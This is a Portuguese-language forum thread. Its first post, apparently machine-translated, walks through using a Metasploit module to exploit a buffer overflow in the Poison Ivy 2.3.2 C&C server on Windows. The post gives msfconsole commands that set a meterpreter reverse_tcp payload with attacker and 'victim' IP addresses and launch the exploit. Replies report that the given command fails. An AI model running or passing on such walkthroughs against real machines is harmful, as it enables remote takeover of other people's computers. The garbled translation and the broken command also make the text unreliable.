Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Hack Windows 7 com Poison Ivy & estouro de buffer do servidor

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Matéria Hack Windows 7 com Poison Ivy & estouro de buffer do servidor

    Este módulo explora um buffer overflow no Poison Ivy 2.3.2 C & C servidor.
    O exploit não precisa saber a senha escolhida para o bot / comunicação do servidor.
    Se a C & C é configurado com a senha 'admin' do padrão, o exploit deve funcionar bem.
    No caso da C & C configurado com outra senha o exploit pode falhar.
    A 'seleção' de comando pode ser usado para determinar se o alvo C & C está usando a senha 'admin' do padrão.
    Esperemos que uma tentativa de exploração não vai falhar o Poison Ivy C & C processo, apenas o segmento responsável de lidar com a conexão.
    Devido a isso o módulo fornece a opção RANDHEADER e um alvo bruteforce.
    Se é usado um RANDHEADER cabeçalho aleatória será usado.
    Se o alvo da força bruta é selecionada, um cabeçalho aleatória será enviada caso o padrão de 'admin' a senha não funciona. Bruteforce vai parar depois de 5 tentativas ou uma sessão obtidos.


    Exploit Metas
    Envenenar Ivy 2.3.2

    Windows XP SP 2

    Windows 7

    Exigência
    Atacante : Backtrack 5

    Vítima PC : Windows 7

    Abrir backtrack tipo de terminal msfconsole



    Agora digite exploit/windows/misc/poisonivy_bof

    Msf exploit (poisonivy_bof)>set payload windows/meterpreter/reverse_tcp

    Msf exploit (poisonivy_bof)>set lhost 192.168.1.4 (IP do Host Local)

    Msf exploit (poisonivy_bof)>set rhost 192.168.1.9 (IP do PC da Vitima)

    Msf exploit (poisonivy_bof)>exploit


  • Font Size
    #2
    o ke é isto Unknown command: exploit/windows/misc/poisonivy_bof

    Comment


    • Font Size
      #3
      Dizendo que o comando não existe.

      Comment

      X
      Working...
      X